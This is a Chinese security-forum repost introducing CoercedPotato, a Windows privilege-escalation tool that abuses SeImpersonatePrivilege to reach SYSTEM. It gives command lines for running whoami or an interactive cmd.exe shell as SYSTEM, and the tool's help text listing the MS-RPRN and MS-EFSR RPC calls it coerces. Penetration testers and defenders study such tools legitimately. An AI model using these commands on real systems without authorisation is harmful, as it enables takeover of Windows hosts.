安全矩阵

 找回密码
 立即注册
搜索
查看: 1177|回复: 0

CoercedPotato!新土豆提权工具

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-12-8 23:14:07 | 显示全部楼层 |阅读模式
hackvens 潇湘信安 2023-12-07 05:30 发表于湖南

工具简介

通过在Windows 10、Windows 11和Server 2022上滥用SeImpersonatePrivilege特权可以从LOCAL/NETWORK SERVICE提升为SYSTEM。


工具使用

  1. 非常快速POC:
  2. .\CoercedPotato.exe -c whoami

  3. 交互式shell的PoC:
  4. .\CoercedPotato.exe -c cmd.exe
复制代码



可以使用--help选项检查帮助消息。
  1. CoercedPotato is an automated tool for privilege escalation exploit using SeImpersonatePrivilege or SeImpersonatePrimaryToken.
  2. Usage: .\CoercedPotato.exe [OPTIONS]

  3. Options:
  4.   -h,--help                   Print this help message and exit
  5.   -c,--command TEXT REQUIRED  Program to execute as SYSTEM (i.e. cmd.exe)
  6.   -i,--interface TEXT         Optionnal interface to use (default : ALL) (Possible values : ms-rprn, ms-efsr
  7.   -n,--exploitId INT          Optionnal exploit ID (Only usuable if interface is defined)
  8.                                -> ms-rprn :
  9.                                  [0] RpcRemoteFindFirstPrinterChangeNotificationEx()
  10.                                  [1] RpcRemoteFindFirstPrinterChangeNotification()
  11.                                -> ms-efsr
  12.                                  [0] EfsRpcOpenFileRaw()
  13.                                  [1] EfsRpcEncryptFileSrv()
  14.                                  [2] EfsRpcDecryptFileSrv()
  15.                                  [3] EfsRpcQueryUsersOnFile()
  16.                                  [4] EfsRpcQueryRecoveryAgents()
  17.                                  [5] EfsRpcRemoveUsersFromFile()
  18.                                  [6] EfsRpcAddUsersToFile()
  19.                                  [7] EfsRpcFileKeyInfo() # NOT WORKING
  20.                                  [8] EfsRpcDuplicateEncryptionInfoFile()
  21.                                  [9] EfsRpcAddUsersToFileEx()
  22.                                  [10] EfsRpcFileKeyInfoEx() # NOT WORKING
  23.                                  [11] EfsRpcGetEncryptedFileMetadata()
  24.                                  [12] EfsRpcEncryptFileExSrv()
  25.                                  [13] EfsRpcQueryProtectors()
  26.                               
  27.   -f,--force BOOLEAN          Force all RPC functions even if it says 'Exploit worked!' (Default value : false)
  28.   --interactive BOOLEAN       Set wether the process should be run within the same shell or open a new window. (Default value : true)
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 22:31 , Processed in 0.012273 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表